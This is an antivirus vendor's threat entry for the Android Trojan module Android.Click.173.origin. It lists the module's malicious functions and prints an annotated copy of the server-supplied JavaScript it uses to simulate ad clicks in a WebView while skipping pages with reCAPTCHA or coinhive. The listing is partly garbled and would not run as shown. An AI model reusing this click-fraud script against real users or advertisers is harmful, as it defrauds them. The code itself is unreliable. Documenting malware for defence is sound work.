
Android.Click.173.origin

Added to the Dr.Web virus database: 2018-04-25

Virus description added:

SHA1:

  • SHA1: 1f0776e3cb408839a876cf9e35a5c21dcec060a9

A detection name for Trojan software modules (SDKs) for Android OS that perform a variety of malicious activities. They are downloaded and launched by other Trojan SDKs, which criminals integrate into various software. Android.Click.173.origin is downloaded from the http://cdn.ads.go******.com/files/* server. The authors of these modules may be the developers of the Trojan SDK Android.Gmobi.

The Android.Click.173.origin managing server is located at https://api.***mobi.com.

Android.Click.173.origin can execute the following actions:

  • sending user information (including the location of the infected device, if the application in which the module is embedded has the appropriate permissions) to the server;
  • silently downloading and installing applications if the device is rooted or if the application in which the Trojan is embedded has permission for silent installation (such an application must reside in the system partition);
  • sending broadcast messages on the server's command, opening windows, and running the services specified in the commands (for example, to automatically launch the "installed applications");
  • sending SMS messages to pay for various services;
  • displaying ads;
  • loading web pages specified by the server in a WebView and simulating user navigation to links using JavaScript downloaded from the management server. For example, the following script has been downloaded from the server:
// Analyst note: command/state object for the injected page script. Its fields are
// reported back to the host app by the console.log("json://" + JSON.stringify(json))
// calls further down in this listing. `ctr` is read by process() as the click-through
// gate (falling back to 50 there). The meaning of `capture`, `close`, `no` and `info`
// is not shown in this listing — presumably interpreted by the host app; verify against
// the native side.
var json = {
"cmd" : "getHtml",
"id" : "5ad9d7ef4efd4c0828472720",
"no" : 2,
"ctr" : 30,
"info" : "0.00:0/0/0.00",
"capture" : false,
"close" : true
}
// Analyst note: `function http.get(u)` is not valid JavaScript (a dotted declaration
// name is a syntax error) and `link` is never declared anywhere in this listing — this
// block looks garbled or partially reproduced; read it as illustrative, not runnable.
// Intent as written: record the target element's outerHTML in `json`, trigger its
// click() when available, and report the result through the "json://" console
// channel; otherwise fall back to the delayed waitAndClose() report. The "json://"
// prefix is the artifact the host app keys on (see the onConsoleMessage note below
// the listing) and is a useful detection string.
function http.get(u)
{
if (!link){
waitAndClose();
return;
}
json.link = link.outerHTML;
if (link.click) {
link.click();
console.log("json://" + JSON.stringify(json))
return;
}
waitAndClose();
}
// First declaration of waitAndClose(): after a 10 s delay, reports the current `json`
// object through the "json://" console channel. Note that waitAndClose is declared a
// second time further down in this listing; since function declarations are hoisted,
// the later declaration is the one in effect for every call in this script.
function waitAndClose(){
setTimeout(function(){
console.log("json://" + JSON.stringify(json))
}, 1000 * 10);
}
// Snapshot of the loaded page. The access is guarded against a missing `document`, but
// in that case `html` is falsy and the unguarded html.toLowerCase() on the next line
// throws a TypeError. `htmllc` is used by the page gate below; `closing` records that
// a close report has already been emitted.
var html = document && document.documentElement && document.documentElement.outerHTML
var htmllc = html.toLowerCase()
var closing = false
// Second (effective) declaration of waitAndClose(): flags the session as closing and
// immediately reports a 'close' command to the host through the console channel.
// Unlike the earlier declaration there is no delay and `json` itself is not sent.
function waitAndClose(){
closing = true
console.log("json://" + JSON.stringify({
'cmd' : 'close',
'close' : true
}))
}
// Concatenates the outerHTML of every element with the given tag name, invoking
// eachCallback on each element first when a callback is supplied. Returns "" when the
// page has no matching elements. Not called anywhere in this listing.
function getAllTagOf(tag, eachCallback){
var html = ""
var items = document.getElementsByTagName(tag);
if (items && items.length > 0){
for(var i = 0; i < items.length; i++){
if (eachCallback) eachCallback(items[i])
html += items[i].outerHTML
}
}
return html
}
// Page gate. The base64 literals decode to "www.google.com/recaptcha", "captcha" and
// "coinhive" respectively; the encoding only hides the strings from a casual read.
// If the lower-cased page HTML contains the reCAPTCHA or coinhive marker the script
// calls forceClose() (not defined in this listing) instead of proceeding — i.e. it
// avoids pages where a simulated click would be challenged or where a miner is already
// present. `cc` ("captcha") is decoded but never used here, and a falsy htmllc does
// nothing. Detection angle: the decoded markers and the atob() wrapping are stable
// artifacts of this injected script.
var gcc = atob('d3d3Lmdvb2dsZS5jb20vcmVjYXB0Y2hh')
var cc = atob('Y2FwdGNoYQ==')
var ch = atob('Y29pbmhpdmU=')
if (!htmllc){
} else if (htmllc.indexOf(gcc) != -1){
forceClose()
} else if (htmllc.indexOf(ch) != -1){
forceClose()
} else {
process()
}
// Core click-simulation routine. Selects one clickable element on the page and
// schedules __click__ (not defined in this listing) on it; every other exit path ends
// in waitAndClose(), which reports back through the console channel. The fixed log
// strings ('Closing', 'Stop :', 'Timeout : ', 'skip ') are stable artifacts an analyst
// can key on in captured console output.
function process(){
var all = document.querySelectorAll('button,a,input')
var links = [];
// Click-through gate from the server command; 50 when json.ctr is 0 or absent.
var CTR = json.ctr || 50;
if (closing){
console.log('Closing')
// Pages with no candidates, or more than ten, are skipped (reason recorded in json.stop).
} else if (all.length == 0 || all.length > 10){
json.stop = 'all.length = ' + all.length;
waitAndClose();
} else {
// Pseudo-random 0..99 derived from the clock; only visits with rnd <= CTR proceed
// to a click, which throttles the fake click-through rate.
var rnd = new Date().valueOf() % 100;
if (rnd > CTR){
json.stop = 'CTR : ' + rnd + ' > ' + CTR ;
waitAndClose();
} else {
var stop = false;
// Candidate selection: anchors, submit buttons, and submit/button inputs are
// collected. Checkboxes are silently ticked; hidden/reset inputs are ignored; any
// other input type aborts the click unless the element carries an `_ignore` marker
// (set nowhere in this listing — presumably by the host app).
for(var i = 0; i < all.length; i++){
var item = all[i]
if ('A' == item.tagName){
item._text = item.innerText
links.push(item)
} else if ('BUTTON' == item.tagName){
if (item.type && item.type.toLowerCase() == 'submit'){
item._text = item.value
links.push(item)
}
} else if ('INPUT' == item.tagName){
var type = item.type && item.type.toLowerCase();
if (type == 'checkbox'){
item.checked = true
} else if (type == 'submit'){
item._text = item.value
links.push(item)
} else if (type == 'button'){
item._text = item.value
links.push(item)
} else if (type == 'hidden'){
} else if (type == 'reset'){
} else {
if (item._ignore){
 console.log('skip ' + item.outerHTML)
} else {
json.stop = item.outerHTML;
console.log('Stop :' + json.stop)
stop = true;
break;
}
}
}
}
if (stop || links.length == 0){
waitAndClose();
} else {
// Delay of 1..5 s and the target index are both taken from the clock, not a PRNG.
var timeout = new Date().valueOf() % 5 + 1;
var index = links.length == 1 ? 0 : (new Date().valueOf() % links.length)
// Reported action. `text` reads innerText even though inputs/buttons had `_text`
// set to `value` above — presumably a leftover; `_text` is not used afterwards.
json.action = {
index : index,
count : links.length,
tag : links[index].tagName,
text : links[index].innerText
}
console.log('Timeout : ' + timeout + " Index : " + index + "/" + links.length)
json.close = false;
setTimeout(function(){__click__(links[index])}, 1000 * timeout);
}
 }
}
}

The Trojan communicates with the JavaScript running in the loaded pages through WebChromeClient.onConsoleMessage.

Curing recommendations


Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Boot your smartphone or tablet into safe mode (depending on the operating system version and the specifications of the particular mobile device, this can be done in various ways; consult the user guide shipped with the device, or contact its manufacturer);
    • Once safe mode is active, install Dr.Web for Android Light on the infected device and run a full system scan; follow the recommended steps to neutralize the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android